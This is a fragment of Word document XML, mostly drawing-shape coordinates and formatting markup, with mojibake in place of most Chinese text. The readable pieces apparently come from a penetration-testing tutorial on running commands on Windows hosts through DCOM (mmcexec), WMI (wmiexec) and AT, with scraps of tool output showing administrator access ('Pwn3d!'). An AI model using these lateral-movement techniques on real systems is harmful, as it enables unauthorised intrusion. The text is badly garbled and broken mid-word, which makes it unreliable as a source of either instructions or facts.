95,6510,12795,6508,12795,6507,12795,6506,12795,6505,12795,6503,12795,6502,12795,6501,12795,6499,12795,6498,12795,6497,12795,6495,12795,6494,12795,6492,12795,6490,12795,6489,12795,6487,12795,6485,12795,6484,12795,6482,12795,6480,12795,6478,12795,6476,12795,6474,12795,6472,12795,6470,12795,6468,12795,6466,12795,6464,12795,6462,12795,6459,12795,6457,12795,6455,12795,6452,12795,6450,12795,6448,12795,6445,12795,6442,12795,6440,12795,6437,12795,6434,12795,6432,12795,6429,12795,6426,12795,6423,12795,6420,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12794,6417,12794,6417,12794,6417,12794,6417,12794,6417,12793,6417,12793,6417,12793,6417,12792,6417,12792,6417,12792,6417,12791,6417,12791,6417,12790,6417,12790,6417,12789,6417,12789,6417,12788,6417,12788,6417,12787,6417,12786,6417,12786,6417,12785,6417,12784,6417,12783,6417,12783,6417,12782,6417,12781,6417,12780,6417,12779,6417,12778,6417,12777,6417,12775,6417,12774,6417,12773,6417,12772,6417,12770,6417,12769,6417,12767,6417,12766,6417,12764,6417,12763,6417,12761,6417,12759,6417,12758,6417,12756,6417,12754,6417,12752,6417,12750,6417,12748,6417,12746,6417,12744,6417,12741,6417,12739,6417,12737,6417,12734,6417,12732,6417,12729,6417,12726,6417,12724,6417,12721,6417,12718,6417,12715,6417,12712,6417,12709,6417,12706,6417,12702,6417,12699,6417,12696,6417,12692,6417,12689,6417,12685,6417,12681,6417,12678,6417,12674,6417,12670,6417,12666,6417,12661,6417,12657,6417,12653,6417,12649,6417,12644,6417,12639,6417,12635,6417,12630,6417,12625,6417,12620,6417,12615,6417,12610,6417,12605,6417,12599,6417,12594,6417,12588,6417,12583,6417,12577,6417,12571,6417,12565,6417,12559,6417,12553,6417,12547,6417,12540e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:681.600pt;width:467.400pt;height:40.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId3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173" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1606" w:firstLine="-15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3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3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>����������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ϣ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>�������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һ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>����</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>�����</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148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6" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="183" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基于dco</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m执行Command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'123456'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‐‐exec‐m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ethod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mmcexec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'whoami'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Web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2008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760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Bv1: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455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BMI9HGC42S\administrator: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Pwn3d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Executed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via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mmcexec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bmi9hgc42s\administrator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5" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="183" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基于wmi执行Comm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and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'123456'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‐‐exec‐m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ethod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wmiexec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'whoami'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Web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2008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760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Bv1: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455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BMI9HGC42S\administrator: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Pwn3d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Executed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via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wmiexec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bmi9hgc42s\administrator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5" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="183" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基于AT执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command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126.500pt;width:0.500pt;height:129.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,2530" coordsize="10,2590">
        <v:shape style="position:absolute;left:10390;top:2530;width:10;height:2590" coordorigin="10390,2530" coordsize="10,2590" path="m10402,2545l10402,2545,10402,2545,10402,2545,10402,2545,10402,2545,10402,2545,10402,2546,10402,2546,10402,2546,10402,2546,10402,2547,10402,2547,10402,2548,10402,2549,10402,2549,10402,2550,10402,2552,10402,2553,10402,2554,10402,2556,10402,2558,10402,2559,10402,2562,10402,2564,10402,2566,10402,2569,10402,2572,10402,2575,10402,2579,10402,2583,10402,2587,10402,2591,10402,2595,10402,2600,10402,2605,10402,2611,10402,2617,10402,2623,10402,2629,10402,2636,10402,2643,10402,2651,10402,2659,10402,2667,10402,2676,10402,2685,10402,2694,10402,2704,10402,2715,10402,2725,10402,2737,10402,2748,10402,2761,10402,2773,10402,2786,10402,2800,10402,2814,10402,2829,10402,2844,10402,2860,10402,2876,10402,2893,10402,2910,10402,2928,10402,2947,10402,2966,10402,2986,10402,3006,10402,3027,10402,3048,10402,3071,10402,3094,10402,3117,10402,3141,10402,3166,10402,3192,10402,3218,10402,3245,10402,3272,10402,3301,10402,3330,10402,3359,10402,3390,10402,3421,10402,3453,10402,3486,10402,3520,10402,3554,10402,3589,10402,3625,10402,3662,10402,3700,10402,3738,10402,3777,10402,3818,10402,3859,10402,3901,10402,3943,10402,3987,10402,4032,10402,4077,10402,4123,10402,4171,10402,4219,10402,4268,10402,4319,10402,4370,10402,4422,10402,4475,10402,4529,10402,4584,10402,4640,10402,4697,10402,4755,10402,4815,10402,4875,10402,4936,10402,4999,10402,5062,10402,5127e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:126.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2530" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:2530;width:8990;height:670" coordorigin="1490,2530" coordsize="8990,670" path="m1510,2545l1510,2545,1510,2545,1510,2545,1510,2545,1510,2545,1510,2545,1511,2545,1512,2545,1512,2545,1514,2545,1515,2545,1517,2545,1519,2545,1521,2545,1524,2545,1528,2545,1532,2545,1536,2545,1541,2545,1546,2545,1552,2545,1559,2545,1566,2545,1575,2545,1583,2545,1593,2545,1603,2545,1615,2545,1627,2545,1640,2545,1654,2545,1668,2545,1684,2545,1701,2545,1719,2545,1738,2545,1758,2545,1780,2545,1802,2545,1826,2545,1851,2545,1877,2545,1904,2545,1933,2545,1963,2545,1995,2545,2028,2545,2063,2545,2099,2545,2136,2545,2175,2545,2216,2545,2259,2545,2303,2545,2348,2545,2396,2545,2445,2545,2496,2545,2549,2545,2604,2545,2660,2545,2719,2545,2779,2545,2841,2545,2906,2545,2972,2545,3041,2545,3112,2545,3184,2545,3259,2545,3336,2545,3416,2545,3498,2545,3582,2545,3668,2545,3757,2545,3848,2545,3941,2545,4037,2545,4136,2545,4236,2545,4340,2545,4446,2545,4555,2545,4666,2545,4780,2545,4897,2545,5017,2545,5139,2545,5264,2545,5392,2545,5523,2545,5657,2545,5793,2545,5933,2545,6076,2545,6222,2545,6370,2545,6522,2545,6677,2545,6835,2545,6997,2545,7161,2545,7329,2545,7500,2545,7675,2545,7853,2545,8034,2545,8219,2545,8407,2545,8598,2545,8793,2545,8992,2545,9194,2545,9400,2545,9609,2545,9823,2545,10039,2545,10260,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2546,10484,2546,10484,2546,10484,2546,10484,2546,10484,2546,10484,2547,10484,2547,10484,2547,10484,2548,10484,2548,10484,2548,10484,2549,10484,2549,10484,2550,10484,2551,10484,2551,10484,2552,10484,2553,10484,2554,10484,2555,10484,2556,10484,2557,10484,2558,10484,2559,10484,2561,10484,2562,10484,2564,10484,2565,10484,2567,10484,2569,10484,2570,10484,2572,10484,2574,10484,2576,10484,2579,10484,2581,10484,2583,10484,2586,10484,2589,10484,2591,10484,2594,10484,2597,10484,2600,10484,2604,10484,2607,10484,2610,10484,2614,10484,2618,10484,2622,10484,2626,10484,2630,10484,2634,10484,2639,10484,2643,10484,2648,10484,2653,10484,2658,10484,2663,10484,2668,10484,2674,10484,2680,10484,2686,10484,2692,10484,2698,10484,2704,10484,2711,10484,2717,10484,2724,10484,2731,10484,2738,10484,2746,10484,2754,10484,2761,10484,2769,10484,2778,10484,2786,10484,2795,10484,2803,10484,2812,10484,2822,10484,2831,10484,2841,10484,2850,10484,2860,10484,2871,10484,2881,10484,2892,10484,2903,10484,2914,10484,2925,10484,2937,10484,2949,10484,2961,10484,2973,10484,2986,10484,2999,10484,3012,10484,3025,10484,3039,10484,3053,10484,3067,10484,3081,10484,3096,10484,3111,10484,3126,10484,3141,10484,3157,10484,3173,10484,3189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5,1510,3205,1510,3205,1510,3205,1510,3205,1510,3205,1510,3205,1510,3205,1510,3204,1510,3204,1510,3204,1510,3203,1510,3203,1510,3202,1510,3202,1510,3201,1510,3201,1510,3200,1510,3199,1510,3199,1510,3198,1510,3197,1510,3196,1510,3195,1510,3194,1510,3193,1510,3192,1510,3190,1510,3189,1510,3187,1510,3186,1510,3184,1510,3182,1510,3181,1510,3179,1510,3177,1510,3174,1510,3172,1510,3170,1510,3167,1510,3165,1510,3162,1510,3160,1510,3157,1510,3154,1510,3151,1510,3147,1510,3144,1510,3140,1510,3137,1510,3133,1510,3129,1510,3125,1510,3121,1510,3117,1510,3112,1510,3108,1510,3103,1510,3098,1510,3093,1510,3088,1510,3082,1510,3077,1510,3071,1510,3065,1510,3059,1510,3053,1510,3047,1510,3040,1510,3034,1510,3027,1510,3020,1510,3012,1510,3005,1510,2997,1510,2990,1510,2982,1510,2973,1510,2965,1510,2956,1510,2948,1510,2939,1510,2929,1510,2920,1510,2910,1510,2900,1510,2890,1510,2880,1510,2870,1510,2859,1510,2848,1510,2837,1510,2825,1510,2814,1510,2802,1510,2790,1510,2777,1510,2765,1510,2752,1510,2739,1510,2726,1510,2712,1510,2698,1510,2684,1510,2670,1510,2655,1510,2640,1510,2625,1510,2610,1510,2594,1510,2578,1510,2562,1510,2545e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:126.600pt;width:445.800pt;height:33.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId32" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:159.500pt;width:449.500pt;height:45.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3190" coordsize="8990,910">
        <v:shape style="position:absolute;left:1490;top:3190;width:8990;height:910" coordorigin="1490,3190" coordsize="8990,91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7,10484,3207,10484,3207,10484,3207,10484,3208,10484,3208,10484,3209,10484,3209,10484,3210,10484,3211,10484,3211,10484,3212,10484,3213,10484,3214,10484,3215,10484,3216,10484,3217,10484,3219,10484,3220,10484,3222,10484,3223,10484,3225,10484,3227,10484,3229,10484,3231,10484,3233,10484,3235,10484,3237,10484,3240,10484,3242,10484,3245,10484,3248,10484,3251,10484,3254,10484,3258,10484,3261,10484,3265,10484,3268,10484,3272,10484,3276,10484,3281,10484,3285,10484,3290,10484,3295,10484,3299,10484,3305,10484,3310,10484,3315,10484,3321,10484,3327,10484,3333,10484,3339,10484,3346,10484,3352,10484,3359,10484,3366,10484,3374,10484,3381,10484,3389,10484,3397,10484,3405,10484,3413,10484,3422,10484,3431,10484,3440,10484,3450,10484,3459,10484,3469,10484,3479,10484,3490,10484,3500,10484,3511,10484,3522,10484,3534,10484,3545,10484,3557,10484,3570,10484,3582,10484,3595,10484,3608,10484,3622,10484,3635,10484,3649,10484,3664,10484,3678,10484,3693,10484,3709,10484,3724,10484,3740,10484,3756,10484,3773,10484,3790,10484,3807,10484,3824,10484,3842,10484,3860,10484,3879,10484,3898,10484,3917,10484,3936,10484,3956,10484,3977,10484,3997,10484,4018,10484,4040,10484,4061,10484,4084,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10483,4106,10482,4106,10482,4106,10480,4106,10479,4106,10477,4106,10475,4106,10473,4106,10470,4106,10466,4106,10462,4106,10458,4106,10453,4106,10448,4106,10442,4106,10435,4106,10428,4106,10419,4106,10411,4106,10401,4106,10391,4106,10379,4106,10367,4106,10354,4106,10340,4106,10326,4106,10310,4106,10293,4106,10275,4106,10256,4106,10236,4106,10215,4106,10192,4106,10168,4106,10143,4106,10117,4106,10090,4106,10061,4106,10031,4106,9999,4106,9966,4106,9931,4106,9895,4106,9858,4106,9819,4106,9778,4106,9735,4106,9691,4106,9646,4106,9598,4106,9549,4106,9498,4106,9445,4106,9391,4106,9334,4106,9275,4106,9215,4106,9153,4106,9088,4106,9022,4106,8953,4106,8883,4106,8810,4106,8735,4106,8658,4106,8578,4106,8497,4106,8413,4106,8326,4106,8238,4106,8146,4106,8053,4106,7957,4106,7859,4106,7758,4106,7654,4106,7548,4106,7439,4106,7328,4106,7214,4106,7097,4106,6977,4106,6855,4106,6730,4106,6602,4106,6471,4106,6337,4106,6201,4106,6061,4106,5918,4106,5773,4106,5624,4106,5472,4106,5317,4106,5159,4106,4997,4106,4833,4106,4665,4106,4494,4106,4319,4106,4141,4106,3960,4106,3776,4106,3587,4106,3396,4106,3201,4106,3002,4106,2800,4106,2594,4106,2385,4106,2172,4106,1955,4106,1734,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4105,1510,4105,1510,4105,1510,4105,1510,4104,1510,4104,1510,4103,1510,4103,1510,4102,1510,4102,1510,4101,1510,4100,1510,4100,1510,4099,1510,4098,1510,4097,1510,4096,1510,4094,1510,4093,1510,4092,1510,4090,1510,4089,1510,4087,1510,4085,1510,4083,1510,4081,1510,4079,1510,4077,1510,4074,1510,4072,1510,4069,1510,4066,1510,4064,1510,4061,1510,4057,1510,4054,1510,4051,1510,4047,1510,4043,1510,4039,1510,4035,1510,4031,1510,4027,1510,4022,1510,4017,1510,4012,1510,4007,1510,4002,1510,3996,1510,3991,1510,3985,1510,3979,1510,3972,1510,3966,1510,3959,1510,3952,1510,3945,1510,3938,1510,3931,1510,3923,1510,3915,1510,3907,1510,3898,1510,3890,1510,3881,1510,3872,1510,3862,1510,3852,1510,3843,1510,3832,1510,3822,1510,3811,1510,3801,1510,3789,1510,3778,1510,3766,1510,3754,1510,3742,1510,3729,1510,3717,1510,3703,1510,3690,1510,3676,1510,3662,1510,3648,1510,3633,1510,3618,1510,3603,1510,3588,1510,3572,1510,3556,1510,3539,1510,3522,1510,3505,1510,3487,1510,3470,1510,3451,1510,3433,1510,3414,1510,3395,1510,3375,1510,3355,1510,3335,1510,3314,1510,3293,1510,3272,1510,3250,1510,3228,1510,3206e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:159.500pt;width:1.500pt;height:45.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3190" coordsize="30,910">
        <v:shape style="position:absolute;left:1490;top:3190;width:30;height:910" coordorigin="1490,3190" coordsize="30,910" path="m1517,3206l1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3207,1517,3207,1517,3207,1517,3207,1517,3208,1517,3208,1517,3209,1517,3209,1517,3210,1517,3211,1517,3211,1517,3212,1517,3213,1517,3214,1517,3215,1517,3216,1517,3217,1517,3219,1517,3220,1517,3222,1517,3223,1517,3225,1517,3227,1517,3229,1517,3231,1517,3233,1517,3235,1517,3237,1517,3240,1517,3242,1517,3245,1517,3248,1517,3251,1517,3254,1517,3258,1517,3261,1517,3265,1517,3268,1517,3272,1517,3276,1517,3281,1517,3285,1517,3290,1517,3295,1517,3299,1517,3305,1517,3310,1517,3315,1517,3321,1517,3327,1517,3333,1517,3339,1517,3346,1517,3352,1517,3359,1517,3366,1517,3374,1517,3381,1517,3389,1517,3397,1517,3405,1517,3413,1517,3422,1517,3431,1517,3440,1517,3450,1517,3459,1517,3469,1517,3479,1517,3490,1517,3500,1517,3511,1517,3522,1517,3534,1517,3545,1517,3557,1517,3570,1517,3582,1517,3595,1517,3608,1517,3622,1517,3635,1517,3649,1517,3664,1517,3678,1517,3693,1517,3709,1517,3724,1517,3740,1517,3756,1517,3773,1517,3790,1517,3807,1517,3824,1517,3842,1517,3860,1517,3879,1517,3898,1517,3917,1517,3936,1517,3956,1517,3977,1517,3997,1517,4018,1517,4040,1517,4061,1517,4084,1517,4106e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:204.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,4090" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:4090;width:8990;height:650" coordorigin="1490,4090" coordsize="8990,650" path="m1510,4106l1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1511,4106,1512,4106,1512,4106,1514,4106,1515,4106,1517,4106,1519,4106,1521,4106,1524,4106,1528,4106,1532,4106,1536,4106,1541,4106,1546,4106,1552,4106,1559,4106,1566,4106,1575,4106,1583,4106,1593,4106,1603,4106,1615,4106,1627,4106,1640,4106,1654,4106,1668,4106,1684,4106,1701,4106,1719,4106,1738,4106,1758,4106,1780,4106,1802,4106,1826,4106,1851,4106,1877,4106,1904,4106,1933,4106,1963,4106,1995,4106,2028,4106,2063,4106,2099,4106,2136,4106,2175,4106,2216,4106,2259,4106,2303,4106,2348,4106,2396,4106,2445,4106,2496,4106,2549,4106,2604,4106,2660,4106,2719,4106,2779,4106,2841,4106,2906,4106,2972,4106,3041,4106,3112,4106,3184,4106,3259,4106,3336,4106,3416,4106,3498,4106,3582,4106,3668,4106,3757,4106,3848,4106,3941,4106,4037,4106,4136,4106,4236,4106,4340,4106,4446,4106,4555,4106,4666,4106,4780,4106,4897,4106,5017,4106,5139,4106,5264,4106,5392,4106,5523,4106,5657,4106,5793,4106,5933,4106,6076,4106,6222,4106,6370,4106,6522,4106,6677,4106,6835,4106,6997,4106,7161,4106,7329,4106,7500,4106,7675,4106,7853,4106,8034,4106,8219,4106,8407,4106,8598,4106,8793,4106,8992,4106,9194,4106,9400,4106,9609,4106,9823,4106,10039,4106,10260,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4107,10484,4107,10484,4107,10484,4107,10484,4107,10484,4108,10484,4108,10484,4108,10484,4109,10484,4109,10484,4110,10484,4110,10484,4111,10484,4111,10484,4112,10484,4113,10484,4114,10484,4114,10484,4115,10484,4116,10484,4117,10484,4119,10484,4120,10484,4121,10484,4122,10484,4124,10484,4125,10484,4127,10484,4129,10484,4131,10484,4132,10484,4134,10484,4137,10484,4139,10484,4141,10484,4143,10484,4146,10484,4148,10484,4151,10484,4154,10484,4157,10484,4160,10484,4163,10484,4166,10484,4170,10484,4173,10484,4177,10484,4181,10484,4185,10484,4189,10484,4193,10484,4197,10484,4202,10484,4206,10484,4211,10484,4216,10484,4221,10484,4226,10484,4232,10484,4237,10484,4243,10484,4249,10484,4255,10484,4261,10484,4268,10484,4274,10484,4281,10484,4288,10484,4295,10484,4302,10484,4310,10484,4317,10484,4325,10484,4333,10484,4341,10484,4350,10484,4358,10484,4367,10484,4376,10484,4385,10484,4395,10484,4404,10484,4414,10484,4424,10484,4434,10484,4445,10484,4456,10484,4466,10484,4478,10484,4489,10484,4501,10484,4512,10484,4525,10484,4537,10484,4549,10484,4562,10484,4575,10484,4588,10484,4602,10484,4616,10484,4630,10484,4644,10484,4659,10484,4673,10484,4688,10484,4704,10484,4719,10484,4735,10484,4751,10484,4751,10484,4751,10484,4751,10484,4751,10484,4751,10484,4751,10483,4751,10482,4751,10482,4751,10480,4751,10479,4751,10477,4751,10475,4751,10473,4751,10470,4751,10466,4751,10462,4751,10458,4751,10453,4751,10448,4751,10442,4751,10435,4751,10428,4751,10419,4751,10411,4751,10401,4751,10391,4751,10379,4751,10367,4751,10354,4751,10340,4751,10326,4751,10310,4751,10293,4751,10275,4751,10256,4751,10236,4751,10215,4751,10192,4751,10168,4751,10143,4751,10117,4751,10090,4751,10061,4751,10031,4751,9999,4751,9966,4751,9931,4751,9895,4751,9858,4751,9819,4751,9778,4751,9735,4751,9691,4751,9646,4751,9598,4751,9549,4751,9498,4751,9445,4751,9391,4751,9334,4751,9275,4751,9215,4751,9153,4751,9088,4751,9022,4751,8953,4751,8883,4751,8810,4751,8735,4751,8658,4751,8578,4751,8497,4751,8413,4751,8326,4751,8238,4751,8146,4751,8053,4751,7957,4751,7859,4751,7758,4751,7654,4751,7548,4751,7439,4751,7328,4751,7214,4751,7097,4751,6977,4751,6855,4751,6730,4751,6602,4751,6471,4751,6337,4751,6201,4751,6061,4751,5918,4751,5773,4751,5624,4751,5472,4751,5317,4751,5159,4751,4997,4751,4833,4751,4665,4751,4494,4751,4319,4751,4141,4751,3960,4751,3776,4751,3587,4751,3396,4751,3201,4751,3002,4751,2800,4751,2594,4751,2385,4751,2172,4751,1955,4751,1734,4751,1510,4751,1510,4751,1510,4751,1510,4751,1510,4751,1510,4751,1510,4751,1510,4751,1510,4751,1510,4751,1510,4751,1510,4751,1510,4751,1510,4751,1510,4751,1510,4750,1510,4750,1510,4750,1510,4750,1510,4749,1510,4749,1510,4748,1510,4748,1510,4747,1510,4747,1510,4746,1510,4745,1510,4745,1510,4744,1510,4743,1510,4742,1510,4741,1510,4740,1510,4739,1510,4738,1510,4736,1510,4735,1510,4734,1510,4732,1510,4730,1510,4729,1510,4727,1510,4725,1510,4723,1510,4721,1510,4719,1510,4716,1510,4714,1510,4712,1510,4709,1510,4706,1510,4704,1510,4701,1510,4698,1510,4694,1510,4691,1510,4688,1510,4684,1510,4680,1510,4677,1510,4673,1510,4669,1510,4664,1510,4660,1510,4656,1510,4651,1510,4646,1510,4641,1510,4636,1510,4631,1510,4626,1510,4620,1510,4614,1510,4608,1510,4602,1510,4596,1510,4590,1510,4583,1510,4577,1510,4570,1510,4563,1510,4555,1510,4548,1510,4540,1510,4532,1510,4524,1510,4516,1510,4508,1510,4499,1510,4490,1510,4481,1510,4472,1510,4463,1510,4453,1510,4443,1510,4433,1510,4423,1510,4413,1510,4402,1510,4391,1510,4380,1510,4368,1510,4357,1510,4345,1510,4333,1510,4321,1510,4308,1510,4295,1510,4282,1510,4269,1510,4255,1510,4242,1510,4228,1510,4213,1510,4199,1510,4184,1510,4169,1510,4154,1510,4138,1510,4122,1510,4106e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:204.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,4090" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:4090;width:30;height:650" coordorigin="1490,4090" coordsize="30,650" path="m1517,4106l1517,4106,1517,4106,1517,4106,1517,4106,1517,4106,1517,4106,1517,4106,1517,4106,1517,4106,1517,4106,1517,4106,1517,4107,1517,4107,1517,4107,1517,4107,1517,4107,1517,4108,1517,4108,1517,4108,1517,4109,1517,4109,1517,4110,1517,4110,1517,4111,1517,4111,1517,4112,1517,4113,1517,4114,1517,4114,1517,4115,1517,4116,1517,4117,1517,4119,1517,4120,1517,4121,1517,4122,1517,4124,1517,4125,1517,4127,1517,4129,1517,4131,1517,4132,1517,4134,1517,4137,1517,4139,1517,4141,1517,4143,1517,4146,1517,4148,1517,4151,1517,4154,1517,4157,1517,4160,1517,4163,1517,4166,1517,4170,1517,4173,1517,4177,1517,4181,1517,4185,1517,4189,1517,4193,1517,4197,1517,4202,1517,4206,1517,4211,1517,4216,1517,4221,1517,4226,1517,4232,1517,4237,1517,4243,1517,4249,1517,4255,1517,4261,1517,4268,1517,4274,1517,4281,1517,4288,1517,4295,1517,4302,1517,4310,1517,4317,1517,4325,1517,4333,1517,4341,1517,4350,1517,4358,1517,4367,1517,4376,1517,4385,1517,4395,1517,4404,1517,4414,1517,4424,1517,4434,1517,4445,1517,4456,1517,4466,1517,4478,1517,4489,1517,4501,1517,4512,1517,4525,1517,4537,1517,4549,1517,4562,1517,4575,1517,4588,1517,4602,1517,4616,1517,4630,1517,4644,1517,4659,1517,4673,1517,4688,1517,4704,1517,4719,1517,4735,1517,4751e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
